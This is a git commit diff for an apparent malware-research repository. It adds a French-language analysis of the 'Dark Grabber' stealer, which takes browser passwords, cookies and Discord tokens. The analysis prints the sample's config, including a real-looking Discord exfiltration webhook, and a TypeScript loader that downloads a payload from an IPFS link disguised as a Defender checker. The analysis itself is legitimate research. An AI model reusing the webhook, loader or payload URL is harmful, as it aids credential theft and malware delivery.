add: random malware

README.md

@@ -7,6 +7,7 @@ Here you can find a list of the samples present in this repo :
 * [Quasar](https://github.com/ALittlePatate/Malware-Research/tree/master/Quasar)
 * [Nanocore](https://github.com/ALittlePatate/Malware-Research/tree/master/Nanocore)
 * [Hancitor](https://github.com/ALittlePatate/Malware-Research/tree/master/Hancitor)
+* [Random malwares found on youtube](https://github.com/ALittlePatate/Malware-Research/tree/master/Random)
 
 # Special thanks
 I want to thank [herrcore](https://github.com/herrcore) for his [videos](https://www.youtube.com/c/OALabs/videos) and [streams](https://www.twitch.tv/oalabslive) about malware analysis, also he was super kind responding to my weird begginer questions on [his discord](https://discord.gg/uBk7wyE8) !

Random/Dark Grabber/writeup.md

@@ -0,0 +1,61 @@
+# Dark Grabber
+
+Il existe deux versions du stealer, une appelée "Debug" et une "Normale".
+<br>
+Les deux sont dans le même .zip et les admins demandent de les lancer les deux.
+
+*insérer une capture*
+
+## Version Normale
+
+Elle est appelée "Install Dark Grabber.bin".
+<br>
+[Virustotal](https://www.virustotal.com/gui/file/8a12f091c08d2287409465e04c15d1ce53da419b626565a8e783e22bbe2368f4)<br>
+C'est du Python 3.10 compilé avec pyinstaller.<br>
+On peut utiliser [pyinstxtractor](https://github.com/extremecoders-re/pyinstxtractor) avec [pycdc](https://github.com/zrax/pycdc) pour retrouver la source.
+<br>
+On extrait les fichiers :
+* antidebug.py
+* browsers.py
+* config.py
+* discordtoken.py
+* injection.py
+* 'Install Dark Grabber'.py
+* startup.py
+* systeminfo.py
+
+C'est un grabber python classique, il récupère les mots de passe des navigateurs, les cookies, les tokens discord et il s'injecte dans discord.
+
+La config :
+```Python
+__CONFIG__ = {
+    'webhook': 'https://discordapp.com/api/webhooks/1050142994168303628/lSVmYxnWxQ8K0VWpnbteH_ThH9-w6BaI765XntsihgtkSQOzXF2fuL5WRfEZaSGHh9Tp',
+    'antidebug': True,
+    'browsers': True,
+    'discordtoken': True,
+    'injection': True,
+    'startup': True,
+    'systeminfo': True }
+```
+
+## Version Debug
+
+Le fichier est appelé "Install Debug Dark Grabber", le nom original est "deno.exe".
+<br>
+[Virustotal](https://www.virustotal.com/gui/file/c5e5db042d3a3e12b8484f29594d157268e3c63631f3a0ffd588ff7ad1d42e2f)
+<br>
+
+C'est du typescript compilé avec [deno](https://deno.land/), il n'existe pas d'extracteur pour deno mais il stocke le code en clair dans l'exe. On peut le dump avec un éditeur hexadécimal comme [HxD](https://mh-nexus.de/en/hxd/).
+<br>
+On extrait le code ci dessous dans **main.ts** :
+```typescript
+import { download, Destination } from "https://deno.land/x/download/mod.ts";
+
+await download("https://bafybeid7gnnacqshr64a6rpn6wevtexbw7kpiv2ckkrcdtnnmdtvd35j2e.ipfs.nftstorage.link/ikiyq", destination);
+```
+
+Ce code va télécharger ikiyq.exe et l'enregistrer sur le disque à `C:/Users/${username}/` sous le nom `Microsoft-Defender-Checker.exe`.
+
+`Microsoft-Defender-Checker.exe` est une dropper avec quelques decoys, il va drop `ikiyq.exe` qui est le stage final.<br>
+[Virustotal de ikiyq.exe](https://www.virustotal.com/gui/file/392a8b2d7633da3a89247681ee1161a93f872d5a9ecee88ef8ed6e578225b71d)<br>
+Pour finir, `ikiyq.exe` est du Python compilé avec [Nuitka](https://github.com/Nuitka/Nuitka).

Random/readme.md

@@ -0,0 +1,2 @@
+This folder holds the malware i find regularly on Youtube by searching for "hacking tools".
+Not everything is in english but you can use google translate.